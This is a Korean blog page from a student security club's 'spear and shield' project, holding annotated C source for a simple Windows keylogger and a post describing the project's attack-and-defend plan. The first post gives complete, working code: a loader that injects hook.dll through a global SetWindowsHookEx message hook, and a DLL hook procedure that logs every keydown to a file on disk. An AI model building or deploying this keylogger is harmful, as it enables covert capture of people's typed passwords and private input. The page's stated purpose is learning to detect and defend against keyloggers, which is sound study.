//lpszCmdParam은 argv와 같이 프로그램의 인자를 의미하고, 마지막으로 nCmdShow는 실행되는 

//프로그램의 모양을 나타낸다.


int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdParam, int nCmdShow)


{


 HWND hWnd; //hWnd 윈도우 핸들



 MSG Message; // 윈도우에서 발생하는 메시지들을 저장할 변수


 WNDCLASS WndClass; // 화면에 생성할 윈도우 클래스 선언


 g_hInst=hInstance;


 WndClass.cbClsExtra=0;


 WndClass.cbWndExtra=0;


 WndClass.hbrBackground=(HBRUSH)GetStockObject(WHITE_BRUSH); // 메인 윈도우 배경색 지정


 WndClass.hCursor=LoadCursor(NULL,IDC_ARROW); // 윈도우 안에서의 마우스 커서모양 IDC_ARROW 기본 모양인 화살표


 WndClass.hIcon=LoadIcon(NULL,IDI_APPLICATION); //메인 윈도우 아이콘


 WndClass.hInstance=hInstance; // 프로그램의 인스턴스


 WndClass.lpfnWndProc=WndProc; // 이 윈도우에서 발생하는 메시지들을 처리할 함수를 지정


 WndClass.lpszClassName=lpszClass; // 이 윈도우의 클래스 이름


 WndClass.lpszMenuName=NULL; // 윈도우에 붙일 메뉴 지정


 WndClass.style=CS_HREDRAW | CS_VREDRAW; 


 RegisterClass(&WndClass);


 hWnd=CreateWindow(lpszClass,lpszClass,WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,


                   CW_USEDEFAULT, NULL,(HMENU)NULL,hInstance,NULL);
//첫번째 인자는 윈도우를 생성할 때 사용할 클래스명, 두번째 인자는 창의 타이틀바에 들어갈 문자열, 세번째 인자는


// 윈도우의 형태(여기선 기본)
//네,다섯번째는 윈도우를 출력할 X,Y 좌표, 그다음 2개는 창의 좌 우 길이, 나머지 4개는 아래와 같
// NULL: the parent of this window
// NULL: this application does not have a menu bar
// hInstance: the first parameter from WinMain
// NULL: not used in this application
 



 ShowWindow(hWnd,nCmdShow); // 위에서 생성한 window를 화면에 출력



 while(GetMessage(&Message,NULL,0,0))


 {


  TranslateMessage(&Message); // 메시지 번역


  DispatchMessage(&Message); // 메시지 처리


 }


 return (int)Message.wParam;


}
// 위 while문은 윈도우 메시지 큐에서 가장 상위에 있는 메시지를 하나 뽑아와서 message 변수에 저장한 후,


// 그것을 번역한 다음 처리하는
// 과정을 담고 있다. 마지막 단계인 처리는 메시지를 메시지처리함수로 전달하는 역할을 한다.


 


LRESULT CALLBACK WndProc(HWND hWnd, UINT iMessage, WPARAM wParam, LPARAM IParam)


{


 static HINSTANCE hinstDll; // LoadLibrary 반환값 저장 변수


 HOOKPROC hGetMsgProc; // GetProcAddress 반환값 저장 변수


 static HHOOK hKeyHook; //SetWindowsHookEx 반환값 저장변수
 switch(iMessage){
//발생한 메시지가 WM_CREATE 일 경우, 즉 윈도우창이 생성되었을 경우 


 case WM_CREATE:
//LoadLibrary 함수는 인자로준 dll을 현재 프로세스의 주소공간으로 mapping 시켜서 사용할 수 있도록 해주는 API 


//이다. 


  hinstDll = LoadLibrary("hook.dll"); // hook.dll load


  if(!hinstDll){


   MessageBox(hWnd, "hooker.dll을 로드할 수 없습니다.", "오류", MB_OK);


   ExitProcess(1);


  }
// GetProcAddress를 이용하여 DLL에서 export한 함수를 가져온다. 즉 hook.dll에서 GetMsgProc 함수를 호출 
hGetMsgProc = (HOOKPROC)GetProcAddress(hinstDll, "GetMsgProc");


  if(!hGetMsgProc){


   MessageBox(hWnd, "GetMsgProc 함수를 찾을 수 없습니다.", "오류", MB_OK);


   FreeLibrary(hinstDll);


   ExitProcess(1);


  }
// SetWindowsHookEx 함수는 자신의 훅 프로시저를 타 어플리케이션으의 훅 체인에 설치한다. 쉽게 말하면 타겟


// 프로그램의 윈도우 메시지 처리 프로시저
// 를 본인이 만든 윈도우 메시지 처리 프로시저로 변경 하는 것을 말한다. 메시지 프로시져 외에 여러가지 


//시스템 콜을 후킹할 수 있다.
// http://ontow.blog.me/140131028775 에서 인자값 확인


  hKeyHook = SetWindowsHookEx(WH_GETMESSAGE, hGetMsgProc, hinstDll, 0);


  if(!hKeyHook){


   MessageBox(hWnd, "Hooking을 성공하지 못했습니다.", "오류", MB_OK);


   FreeLibrary(hinstDll);


   ExitProcess(1);


  }


  return 0;          
 case WM_DESTROY:


  PostQuitMessage(0);


  return 0;


 }
 //DefWindowProc 함수는 WndProc에서 처리하지 않은 나머지 메시지에 관한 처리


 return(DefWindowProc(hWnd,iMessage,wParam,IParam));
}
// 위 메시지를 처리하는 함수는 CALLBACK 타입으로 지정된다. CALLBACK 이라는 것은 이 함수가 사용자에


// 의해 호출되는 것이 아닌, 프로그램에 의해 호출되는 것을 의미한다. 즉 DispatchMessage() 함수에 의해


// 호출된다. 인자들을 살펴보면 hWnd는 이메시지가 발생한 윈도우가 어떤것 이었는지 말해주고, iMessage는


// 실제 발생한 메시지를 나타내며, 마지막 wParam과 IParam은 해당 메시지의 추가 옵션으로 이해하면된다.
// 윈도우 메시지의 종류로 http://cafe.naver.com/pplus.cafe?iframe_url=/ArticleRead.nhn%3Farticleid=167&


//  여기서 확인
 
 
 
hook.dll 소스코드
// GetMsgProc 함수의 원형을 자세히보면 앞서 WndProc 라고 선언했던 CALLBACK 함수와 거의 비슷하다.


// 메시지가 발생했을때
// CALLBACK 함수로 전달된 인자들의 정보가 가공되어 이 GetMsgProc 함수로 전달된다.
// SetWindowsHookEx 함수에 의해 윈도우 내에서 발생하는 모든 메시지가 위 함수를 한번 거친후 자신의


// 본래 작업을 실행하게 된다.
// 즉 메시지발생->GetMsgProc처리->WndProc처리
 
 
#include <windows.h>

__declspec(dllexport) LRESULT CALLBACK GetMsgProc(INT nCode, WPARAM wp, LPARAM lp)
{
// message에서 발생한 메시지를 얻는다 그리고 그 메시지가 WM_KEYDOWN 라면 if문 실행
	if(((MSG*)lp)->message == (long)WM_KEYDOWN)	
	{			 
		HANDLE hFile; // 핸들변수
		DWORD dwWrite; // http://irontooth.tistory.com/117 확인

       	hFile = CreateFile("c:\\test.txt", GENERIC_WRITE, 0, NULL, OPEN_ALWAYS,
			FILE_ATTRIBUTE_NORMAL, NULL); 


                 // http://blog.naver.com/zerolive_?Redirect=Log&logNo=10005814846 확인	
		SetFilePointer(hFile, 0, 0, FILE_END); 


                 //http://irontooth.tistory.com/98 확인			
		WriteFile(hFile, &((MSG*)lp)->wParam, 1, &dwWrite, NULL); 


                 //http://irontooth.tistory.com/117 확인
		CloseHandle(hFile);			
	}
	return TRUE;	
}


 



성현이-초간단키로거.zip


 

성현이-초간단키로거.zip

            



                    

  





  



  





    
        
            저작자표시 
        
    


  




                    


  
'프로젝트 > 창과 방패' 카테고리의 다른 글

  

    

      김성현군이 만든 초간단키로거 분석  (0)
      2012.01.22
    

    

      창과 방패 프로젝트란..  (0)
      2012.01.21
    

  










							

							
Posted by NullBr4in

							
							
							

								
								
							

							
							
							

						

					

				

				

			
                    
                
                    
				
프로젝트/창과 방패2012. 1. 21. 04:07

				

				

					

						

							
창과 방패 프로젝트란..

						

						

						
							
							
							




								            



            
프로젝트 팀원끼리 아무나 샘플 프로그램에 대해 공격을 하면 다른 사람은 또 방어 하는 동아리에서 하고 있는 

프로젝트입니다.




현재 진행 중인 주제는 "키로거" 입니다.




팀원 내 한 명이 간단한 키로거를 처음으로 올려두었고, 이전에 해당 키로거를 분석을 끝내고 




이제 방어하는 프로그램을 만들어 보려고 합니다. 







사실은 이 프로젝트는 친구 혼자 후킹에 대해 공부하면서 키로거를 제작해보려는 개인 프로젝트 였습니다.



근데 제가 2011년 후반기에 있던 안랩 세미나에 갔을때, 쉬는시간에 실무자분들께 질문 할 수 있는 시간이 있어서 



공부 방향에 대해 지금 하고 있는것이 맞는지에 대해 물어 보았습니다.



지금 공부 방법에 대해 말했다가 엄청 혼났구요,,, 혼난 이유는,, 어떻게 보면 당연한거였습니다. 



뚫는 법을 알아야 막는법을 안다라는 말에서 제가 편한 부분만 취한거죠.. 



 생각하면서 4년 동안 공격에 대한 공부만 해왔습니다....



실무자분께서는 보안 공부하는데 꼭 공격을 할 필요가 있냐.. 현재 존재하는 악성프로그램들에 대해 방어 프로그램을



만들어보면 더 좋다고 하셨습니다.. 그리고 리버싱 기술에 대해서도.. 남이 만든 프로그램 크랙하기 보다는 



자기가 여러가지 언어로 만든 프로그램을 직접 리버싱 해보는게 도움이 된다고 하셨고요..



그래서 제 친구가 후킹에 대해 공부한다고 할 때 그럼 이걸 공동 프로젝트로 진행해서 방어도 같이 해보자는 의견을



내서 이 프로젝트가 시작되었습니다... 













아래는 프로젝트 계획서 입니다. 재밌어 보이나요?? 게시판 이야기는 동아리 홈페이지에 있는 게시판입니다~
















----------------------------------------------------------------------------------------------------- 



본 게시판은 현 회장 안준과 2기 전성의 자체적 공동 연구주제인 키보드 해킹과 방어에 대한 연구 목적으로 개설되었습니다.








공통 연구 주제



0. WinApi Hooking



1. Dll Injection



2. Programming



3, 아래 열거 사항에 대한 공격과 방어



 



연구 주요 내용



0. 공격자는 지속적인 키로거를 제작하여 정해진 입력폼 프로그램이 활성화 됐을 때 방어자의 방어 프로그램을 무력화 시킨다.



1. 방어자는 정해진 입력폼 프로그램이  활성화 됐을 때 키로거를 탐지하고 키로그 기능을 원천적으로 방어해 낸다.



2. 공격자는 최신 트렌드의 입력폼 삽입공격에 대한 공격을 무차별 적으로 사용할 수 있다.



3. 방어자는 리소스에 대한 제약을 받지 않고 공격을 막을 수 있다.



 



연구 목적



0. 최종적으로 공격자와 방어자는 방어법을 익히는데 목적을 둔다.



1. 공격자와 방어자는 서로의 지식을 공유하고 공격과 방어법을 공유하여 서로의 지식을 공유하여 빠른 학습을 도운다.



 



연구 증명



0. 주기적으로 공격자와 방어자는 본 게시판에 진행 내역을 올린다.



1. 공격자 방어자는 서로의 프로그램이 뚫리면 이를 보고하고 대안된 프로그램으로 업데이트한다.










 



 

            



                    

  





  



  





    
        
            저작자표시 
        
    


  




                    


  
'프로젝트 > 창과 방패' 카테고리의 다른 글

  

    

      김성현군이 만든 초간단키로거 분석  (0)
      2012.01.22
    

    

      첫번째 방패 - 첫번째 키로거  (19)
      2012.01.22
    

  










							

							
Posted by NullBr4in

							
							
							

								
								
							

							
							
							

						

					

				

				

			
                    
                
			
			
				
			
			
		

		

		
	




  
티스토리툴바